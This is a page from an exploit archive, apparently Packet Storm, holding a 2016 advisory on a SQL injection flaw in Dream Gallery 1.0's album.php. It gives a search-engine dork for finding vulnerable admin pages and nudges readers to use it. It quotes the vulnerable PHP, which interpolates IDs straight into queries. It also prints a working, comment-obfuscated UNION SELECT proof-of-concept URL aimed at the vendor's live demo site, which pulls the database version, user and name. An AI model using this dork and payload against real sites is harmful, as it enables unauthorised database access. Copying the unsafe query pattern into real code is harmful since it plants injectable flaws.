exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dream Gallery 1.0 SQL Injection

Dream Gallery 1.0 SQL Injection
Posted Jan 11, 2016
Authored by Felipe Andrian Peixoto

Dream Gallery version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 33ad05d0f2a68f5a2cd399ca877cb6628ebdcb4ad512b5d4857db14b9c45a5ee

Dream Gallery 1.0 SQL Injection

Change Mirror Download
[+] Sql Injection on Dream Gallery v1.0

[+] Date: 10/01/2016

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://clareslab.com.br/

[+] Software Demo : http://clareslab.com.br/dream/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: intitle:"Dream Gallery - Admin" // use your brain ;)

[+] Admin Page: http://host/admin/

[+] Exploit :

http://host/patch//album.php?id= [SQL Injection]

[+] Vulnerable File :

<?php

$db->query( "select * from albuns order by album_name asc" )->fetchAll();
if ( $db->rows >= 1 )
{
$albuns = $db->data;
foreach ( $albuns as $album )
{
$a = ( object ) $album;
$db->query( "select * from fotos where foto_album = $a->album_id order by foto_pos asc" )->fetchAll();
if ( $db->rows >= 1 )
{
$f = ( object ) $db->data[0];
?>
<div class="box-detail box-alb" id="<?= $a->album_id ?>">
<div class="box-inner-alb">
<a href="album.php?id=<?= $a->album_id ?>" caption="<?= utf8_decode( $a->album_name ) ?>">
<img src="thumb.php?img=fotos/<?= $f->foto_url ?>" />
<div class="box-inner-fx">
<h2><?= utf8_decode( $a->album_name ) ?></h2>
</div>
</a>
</div>
<div class="box-bottom">
<div class="box-bottom-right-photo"><?= $db->rows ?> foto(s)</div>
</div>
</div>
<?php
}
}
}
?>

[+] PoC :

http://clareslab.com.br/dream/album.php
?id=658+and+1*2*3=6+and+0+/*!12345union*/+/*!12345select*/+1,group_concat(0x53716c20496e6a656374696f6e20447265616d2047616c6c657279202d2046656c69706520416e647269616e20506569786f746f,0x3c62723e,version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10--+


[+] EOF
Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    65 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    23 Files
  • 23
    May 23rd
    15 Files
  • 24
    May 24th
    49 Files
  • 25
    May 25th
    20 Files
  • 26
    May 26th
    13 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close